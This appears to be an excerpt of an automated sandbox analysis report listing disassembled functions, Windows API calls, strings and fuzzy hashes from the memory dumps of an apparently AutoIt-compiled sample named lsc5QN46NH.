Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 4eacf1ae157d20aac90d273d5321cfdef0a26d74e5fae20b0730d7eba7705bf1
Instruction ID: 919a5b6384692f4a8938330daf20b9b5388102664e950906bd5028c2427372cc
Opcode Fuzzy Hash: 4eacf1ae157d20aac90d273d5321cfdef0a26d74e5fae20b0730d7eba7705bf1
Instruction Fuzzy Hash: 1DF0823554522DBBDB61AFA4CC48FEA776EBF09361F004269F919D6181DA309A40CBE1

Function 006581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658309), ref: 006581E0
CloseHandle.KERNEL32(?,?,00658309), ref: 006581F2

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 4f6c9c2d531e3011ccd5ad3575200bff6407341cd795b51d7b7aa6bd87e9ad9e
Instruction ID: 0ae0a22979e15a5da6eb5d3b27fc636182cb5ca5eeb0fd5c49687ffa464a1074
Opcode Fuzzy Hash: 4f6c9c2d531e3011ccd5ad3575200bff6407341cd795b51d7b7aa6bd87e9ad9e
Instruction Fuzzy Hash: 7DE04F31000911AFE7212B60FC04D737BABEB04310710892DB89580831CB215C90DB10

Function 0062A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00628D57,?,?,?,00000001), ref: 0062A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0062A163

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
Instruction ID: 1d883a3215d42a99e09cffeced93c567c02d11e6a282e1bbdfda2c2b38d78416
Opcode Fuzzy Hash: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
Instruction Fuzzy Hash: 50B09231254308BBCB002B91EC09B883F6AEB46AA2F405120F60D84060CF6254508BD1

Function 0062F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
Instruction ID: a3c3502b8db498f2a13831ebf6168cd5d40a0d004d690b806e946c1a5d51f5cb
Opcode Fuzzy Hash: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
Instruction Fuzzy Hash: C332E321D29F114DD7239A34E832336A25EAFB73D4F15D737E81AB5EA9EB29C4834500

Function 0063242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
Instruction ID: 1fefb13f732117c3abf094b6eb170ce72778efcfdc621a3517c1666d1782a983
Opcode Fuzzy Hash: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
Instruction Fuzzy Hash: B3B10130D2AF414DD7239A398831336B69DAFBB6C5F51E71BFC2674D22EB2185834181

Function 006587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00658389), ref: 006587D1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
Instruction ID: 9b3d629fd4761fee4c5312106b7507c25b69b6e53042291c7c6e86a9f9941d31
Opcode Fuzzy Hash: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
Instruction Fuzzy Hash: B6D09E3226450EBFEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60

Function 0062A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062A12A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
Instruction ID: 74536e93a555ca0174a3be9061235ca17af4f7d0f7f882f9a06e387711d463c8
Opcode Fuzzy Hash: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
Instruction Fuzzy Hash: D8A0113000020CBB8B002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC0

Function 00618808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e7bd3a4f85709a6116437ab73e89ef84af6fcc59c0d28b058ebce056209194
Instruction ID: e21dc2ed26edd3dfe0f7bfd8513642d98b4481470a97187c4dff51c635e5bc47
Opcode Fuzzy Hash: 46e7bd3a4f85709a6116437ab73e89ef84af6fcc59c0d28b058ebce056209194
Instruction Fuzzy Hash: 5E2213309045068FDF388A28C4A87FC7BA3BF01345F2C856AE9478B692DB749DD6C741

Function 006221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: b770ffa99313a6f748db1fc15da66a495b8ef8f2ecdb2844d543801f2ea643c1
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 8AC197322094734ADB2D4639E4340BEBBA25EA37B131A176DD4B3DF2D4EE10D966DA10

Function 006225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: e7cc3fcab7fac4fa7f49513cd97752f661c0bdab8e4c74527c88a32fd57b73c3
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: C2C197332095B34ADF2D463AD4340BEBAA25EA37B131B176DD4B2DF2D4EE10C965DA10

Function 00621978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 8a21e76794810370fafc15c5246927344331ae88dbcea3b004b24fa1639207ae
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 9AC1A63624D4B34ADF2D463994341BEBAA25EB37B131B176DD4B2CF2C4EE20C965DA10

Function 01645370 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: b048e160791849b041d731b0ef6a4d4e63d5ef565cc7808e7990503080a87ebb
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: F941D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40

Function 01645260 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: e99db1eebf2cb534956c40a81c6824a90527350c608438361c24a1ac9cef9df8
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 5D019278A01109EFCB44DF98C5909AEF7B6FF48310F60869AE90AA7701D730AE41DB80

Function 01645200 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: f5a7a09a4b8519b7970ee45cb6f3cb771ae728322c246d6b1d4cf288b8d8fec3
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: FF019278A00109EFCB44DF98C5909AEF7B6FB48310F20859AE91AA7701E730AE41DB80

Function 01643BD0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00677806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0067785B
DeleteObject.GDI32(00000000), ref: 0067786D
DestroyWindow.USER32 ref: 0067787B
GetDesktopWindow.USER32 ref: 00677895
GetWindowRect.USER32(00000000), ref: 0067789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677A35
GetClientRect.USER32(00000000,?), ref: 00677A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00677A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677ABB
GlobalLock.KERNEL32(00000000), ref: 00677AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AD3
GlobalUnlock.KERNEL32(00000000), ref: 00677ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AE3
GlobalFree.KERNEL32(00000000), ref: 00677AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00692CAC,00000000), ref: 00677B16
GlobalFree.KERNEL32(00000000), ref: 00677B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00677B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00677B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677D7A

Strings

static, xrefs: 00677A75, 00677BCC
AutoIt v3, xrefs: 00677A2D
, xrefs: 00677D00
DISPLAY, xrefs: 00677BDD

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 28a5487cf989e40a3081c9e378973c9a384451a9494badbd4a00b80310e0180b
Instruction ID: 1c0be31942dd45ec469acf5a34be8fb185678f4a55cd5638c7fc989500a7d449
Opcode Fuzzy Hash: 28a5487cf989e40a3081c9e378973c9a384451a9494badbd4a00b80310e0180b
Instruction Fuzzy Hash: B1026C71900115EFDB14DFA4DC89EAE7BBAFF48310F108268F919AB2A1D774AD41CB60

Function 0068356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0068F910), ref: 00683627
IsWindowVisible.USER32(?), ref: 0068364B

Strings

SETCURRENTSELECTION, xrefs: 006837B6
ISENABLED, xrefs: 0068366B
GETCURRENTCOL, xrefs: 00683928
UNCHECK, xrefs: 00683883
ISVISIBLE, xrefs: 00683637
GETLINE, xrefs: 0068399B
ISCHECKED, xrefs: 00683839
SELECTSTRING, xrefs: 00683806
GETLINECOUNT, xrefs: 006838C6
TABLEFT, xrefs: 00683687
GETCURRENTLINE, xrefs: 006838ED
HIDEDROPDOWN, xrefs: 00683700
GETCURRENTSELECTION, xrefs: 006837E3
ADDSTRING, xrefs: 00683716
GETSELECTED, xrefs: 006838A3
CURRENTTAB, xrefs: 006836BD
TABRIGHT, xrefs: 0068369D
SENDCOMMANDID, xrefs: 006839DA
EDITPASTE, xrefs: 0068395F
FINDSTRING, xrefs: 00683776
DELSTRING, xrefs: 00683749
CHECK, xrefs: 0068386D
SHOWDROPDOWN, xrefs: 006836E0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 495e162fc4f8a9b9b28f8f0f44fea99eb42c7ed34e85609e62bb1bdcd5632165
Instruction ID: cc09071863c5c083f5c1d95eb4817726a96a0e5091d00235fbd9d414692c37cc
Opcode Fuzzy Hash: 495e162fc4f8a9b9b28f8f0f44fea99eb42c7ed34e85609e62bb1bdcd5632165
Instruction Fuzzy Hash: CCD17E702043219BCB48FF10C451AAE7BA7AF95754F144A6CF8825B3A3DB31EE4ACB55

Function 0068A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0068A630
GetSysColorBrush.USER32(0000000F), ref: 0068A661
GetSysColor.USER32(0000000F), ref: 0068A66D
SetBkColor.GDI32(?,000000FF), ref: 0068A687
SelectObject.GDI32(?,00000000), ref: 0068A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0068A6C1
GetSysColor.USER32(00000010), ref: 0068A6C9
CreateSolidBrush.GDI32(00000000), ref: 0068A6D0
FrameRect.USER32(?,?,00000000), ref: 0068A6DF
DeleteObject.GDI32(00000000), ref: 0068A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0068A731
FillRect.USER32(?,?,00000000), ref: 0068A763
GetWindowLongW.USER32(?,000000F0), ref: 0068A78E

Part of subcall function 0068A8CA: GetSysColor.USER32(00000012), ref: 0068A903
Part of subcall function 0068A8CA: SetTextColor.GDI32(?,?), ref: 0068A907
Part of subcall function 0068A8CA: GetSysColorBrush.USER32(0000000F), ref: 0068A91D
Part of subcall function 0068A8CA: GetSysColor.USER32(0000000F), ref: 0068A928
Part of subcall function 0068A8CA: GetSysColor.USER32(00000011), ref: 0068A945
Part of subcall function 0068A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068A953
Part of subcall function 0068A8CA: SelectObject.GDI32(?,00000000), ref: 0068A964
Part of subcall function 0068A8CA: SetBkColor.GDI32(?,00000000), ref: 0068A96D
Part of subcall function 0068A8CA: SelectObject.GDI32(?,?), ref: 0068A97A
Part of subcall function 0068A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0068A999
Part of subcall function 0068A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068A9B0
Part of subcall function 0068A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0068A9C5
Part of subcall function 0068A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068A9ED

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 198adb0af4fcc837f33b381fbb47a1a4a6436b8187ef7a83124030ec05cfcd9f
Instruction ID: ee11a7fd95b7a478ac7b8d44b165908166777d17d2c22bc8d7db6a99e0efb05c
Opcode Fuzzy Hash: 198adb0af4fcc837f33b381fbb47a1a4a6436b8187ef7a83124030ec05cfcd9f
Instruction Fuzzy Hash: 00918E72408301FFD710AFA4DC08E5B7BAAFF89321F141B2AF9A2961A1D771D945CB52

Function 00602C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00602CA2
DeleteObject.GDI32(00000000), ref: 00602CE8
DeleteObject.GDI32(00000000), ref: 00602CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00602CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00602D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0063C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0063C89D

Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A

SendMessageW.USER32(?,00001053), ref: 0063C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063C912

Strings

0, xrefs: 0063C731

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

